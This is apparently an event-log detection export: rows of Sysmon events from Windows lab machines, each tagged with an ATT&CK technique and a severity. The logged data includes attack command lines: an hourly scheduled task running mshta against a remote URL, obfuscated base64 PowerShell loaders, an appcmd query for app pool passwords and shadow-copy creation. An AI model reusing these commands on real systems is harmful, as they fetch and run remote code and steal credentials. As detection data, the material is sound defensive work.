ADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558497731.307031,2019-05-22T08:02:11.307031+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 839 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-22 04:02:11.287 + 365ABB72-C9C3-5CE4-0000-00101F422E00 + 2888 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-C32E-5CE4-0000-00205DF00000 + 0xf05d + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-C9C1-5CE4-0000-00100B222E00 + 3156 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1600 CREDAT:275470 /prefetch:2 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969968.655114,2019-05-27T19:12:48.655114+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6182 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.456 + 365ABB72-FE6F-5CEB-0000-0010D33A0C00 + 3344 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436000.711201,2019-07-30T01:33:20.711201+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4907 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:19.556 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49826 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1558452779.809883,2019-05-21T19:32:59.809883+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4129 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:59.729 + 365ABB72-1A2B-5CE4-0000-00102F502201 + 3772 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR "mshta.exe https://hotelesms.com/Injection.txt" /F + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + "C:\Windows\System32\mshta.exe" https://hotelesms.com/talsk.txt + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10154 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 22:52:27.588 + 365ABB72-D1AB-5CC8-0000-0010DB1E4400 + 1372 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-C494-5CC8-0000-0020E4FF0000 + 0xffe4 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-D0E5-5CC8-0000-0010DADF3E00 + 2892 + C:\Windows\System32\cmd.exe + cmd + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""") and Parent Image :C:\Windows\explorer.exe , Parent CommandLine (C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10662 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 11:53:29.768 + 747F3D96-F639-5D53-0000-0010B0FC2600 + 8180 + C:\Windows\System32\wscript.exe + 5.812.10240.16384 + Microsoft ® Windows Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + "c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))""" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C + 747F3D96-F639-5D53-0000-001092EE2600 + 6000 + C:\Windows\explorer.exe + C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.822932,2019-05-27T05:29:18.822932+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5937 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.782 + 365ABB72-3D6E-5CEB-0000-00106FA6FF00 + 1876 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:vdir.name + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16389 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:30:46.275 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-2006-5CD8-0000-0010A2862300 + 2960 + C:\Windows\System32\rundll32.exe + "C:\Windows\System32\rundll32.exe" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6180 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.402 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6180 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:47.402 + 365ABB72-FE6F-5CEB-0000-0010F4370C00 + 3448 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create "ClientAccessible", "C:\" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4128 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 06:58:39.888 + 365ABB72-1A29-5CE4-0000-001079F92101 + 2432 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49703 + + false + 108.179.232.58 + gator4243.hostgator.com + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10153 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 22:49:09.276 + 365ABB72-D0E5-5CC8-0000-0010DADF3E00 + 2892 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-C494-5CC8-0000-0020E4FF0000 + 0xffe4 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-D0E4-5CC8-0000-00103CB73E00 + 3680 + C:\Windows\Installer\MSI4FFD.tmp + "C:\Windows\Installer\MSI4FFD.tmp" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5934 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.702 + 365ABB72-3D6E-5CEB-0000-0010AFA2FF00 + 3812 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool ". )" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6A